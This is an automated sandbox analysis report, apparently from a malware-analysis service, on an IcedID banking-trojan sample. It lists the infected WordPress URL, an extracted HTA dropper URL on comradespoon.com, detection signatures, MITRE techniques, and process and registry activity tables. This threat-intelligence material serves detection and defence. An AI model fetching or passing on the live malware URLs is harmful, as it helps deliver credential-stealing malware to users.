icedid | hxxps://www[.]fencingindia[.]co[.]in/HOLD-blog/wp-content/uploads/2021/11/cafeteria[.]php

Analysis

max time kernel
1544s
max time network
1563s
platform
windows10_x64
resource
win10-20220414-en
submitted
06-07-2022 18:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.fencingindia.co.in/HOLD-blog/wp-content/uploads/2021/11/cafeteria.php

Score

10^/10

icedid 1487191074 banker suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://comradespoon.com/7h.hta

Extracted

Family

icedid

Campaign

1487191074

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata

Blocklisted process makes network request 13 IoCs

Processes:

mshta.exepowershell.exerundll32.exemshta.exerundll32.exe

flow	pid	process
268	1668	mshta.exe
269	3040	powershell.exe
271	2236	rundll32.exe
272	1028	mshta.exe
273	4740	rundll32.exe
285	2236	rundll32.exe
294	4740	rundll32.exe
300	2236	rundll32.exe
310	4740	rundll32.exe
312	2236	rundll32.exe
317	4740	rundll32.exe
332	2236	rundll32.exe
352	4740	rundll32.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

ChromeRecovery.exe

pid process

3824 ChromeRecovery.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000\Control Panel\International\Geo\Nation cmd.exe
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

2236 rundll32.exe
4740 rundll32.exe

pid	process
3824	ChromeRecovery.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
2236	rundll32.exe
4740	rundll32.exe

Drops file in Program Files directory 7 IoCs

Processes:

elevation_service.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\ChromeRecoveryCRX.crx	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\ChromeRecovery.exe	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\ChromeRecovery.exe	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\manifest.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\manifest.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\_metadata\verified_contents.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir860_585621380\_metadata\verified_contents.json	elevation_service.exe

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "132"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000ecf39ec6fe72d8c0de01269571317f5e740e1e427233f2606b9053cd8115c67b35b21a6b2558c8ec40f2ac79a02b053e5fb53bf24a712d2f414f	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.bredband2.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{31457431-4D5B-4189-B4C0-01A217D6BC22}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\bing.com\NumberOfSubdomain = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\bredband2.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000948290770667e083b645f844b905caf49cb178dcfae9b08ed38c2b1049c08107dcd19ca12d99a238384f7c52794d24ba580ee871e105eec8e974	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{17C4A0AB-14B8-48F0-BF99-42648CBA8097} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\bing.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\NumberOfSubdomains = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "3058"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\ACGStatus	MicrosoftEdgeCP.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exepowershell.exechrome.exepowershell.exe7zFM.exepowershell.exerundll32.exepowershell.exepowershell.exerundll32.exe

pid	process
2288	chrome.exe
2288	chrome.exe
4412	chrome.exe
4412	chrome.exe
3752	chrome.exe
3752	chrome.exe
3752	chrome.exe
3752	chrome.exe
3940	chrome.exe
3940	chrome.exe
4556	chrome.exe
4556	chrome.exe
1532	chrome.exe
1532	chrome.exe
1272	chrome.exe
1272	chrome.exe
5108	chrome.exe
5108	chrome.exe
4104	chrome.exe
4104	chrome.exe
2232	chrome.exe
2232	chrome.exe
3908	chrome.exe
3908	chrome.exe
4556	chrome.exe
4556	chrome.exe
4368	chrome.exe
4368	chrome.exe
2196	chrome.exe
2196	chrome.exe
3540	powershell.exe
3540	powershell.exe
3540	powershell.exe
3540	powershell.exe
3492	chrome.exe
3492	chrome.exe
3492	chrome.exe
3492	chrome.exe
668	powershell.exe
668	powershell.exe
668	powershell.exe
668	powershell.exe
3892	7zFM.exe
3892	7zFM.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3892	7zFM.exe
3892	7zFM.exe
2236	rundll32.exe
2236	rundll32.exe
2284	powershell.exe
2284	powershell.exe
2284	powershell.exe
2284	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
4740	rundll32.exe
4740	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

3892 7zFM.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

3028
3028

pid	process
3892	7zFM.exe

pid	process
3028
3028

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

Processes:

chrome.exechrome.exe

pid	process
4412	chrome.exe
4412	chrome.exe
4412	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe
4556	chrome.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exefirefox.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe7zG.exepowershell.exe7zG.exe7zFM.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2244	MicrosoftEdge.exe
Token: SeDebugPrivilege	2244	MicrosoftEdge.exe
Token: SeDebugPrivilege	2244	MicrosoftEdge.exe
Token: SeDebugPrivilege	2244	MicrosoftEdge.exe
Token: SeDebugPrivilege	3336	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3336	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3336	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3336	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	4556	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4556	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4556	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4556	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5100	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5100	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2244	MicrosoftEdge.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeRestorePrivilege	1080	7zG.exe
Token: 35	1080	7zG.exe
Token: SeSecurityPrivilege	1080	7zG.exe
Token: SeSecurityPrivilege	1080	7zG.exe
Token: SeDebugPrivilege	3540	powershell.exe
Token: SeRestorePrivilege	4044	7zG.exe
Token: 35	4044	7zG.exe
Token: SeSecurityPrivilege	4044	7zG.exe
Token: SeSecurityPrivilege	4044	7zG.exe
Token: SeRestorePrivilege	3892	7zFM.exe
Token: 35	3892	7zFM.exe
Token: SeDebugPrivilege	3520	firefox.exe
Token: SeSecurityPrivilege	3892	7zFM.exe
Token: SeDebugPrivilege	668	powershell.exe
